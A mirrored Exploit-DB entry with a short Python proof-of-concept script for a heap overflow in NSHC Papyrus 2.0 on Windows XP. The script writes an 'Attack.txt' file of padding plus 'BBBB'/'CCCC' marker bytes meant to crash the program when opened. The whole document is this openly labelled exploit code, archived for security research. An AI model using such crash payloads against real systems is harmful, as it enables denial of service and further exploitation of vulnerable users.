exploit-db-mirror/exploits/windows/dos/17664.py
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

22 lines
No EOL
519 B
Python
Executable file

#!/usr/bin/python
#
# Title: NSHC Papyrus Heap Overflow Vulnerability
# Date: 13\08\2011
# Author: wh1ant
# Software Link: http://file.atfile.com/ftp/data/03/PapyrusSetup.exe
# Version: 2.0
# Tested On: windows XP SP3 South Korea / windows XP SP3 English VMware Workstation
# CVE: N/A
# Notice:
# Encrypt/Decrypt programs that are created by NSHC
#
fd = open("Attack.txt", "w")
data = 'A'
for i in range(0, 1003):
fd.write(data)
fd.write("BBBB");
fd.write("CCCC");
for i in range(0, 2000):
fd.write(data);
fd.close()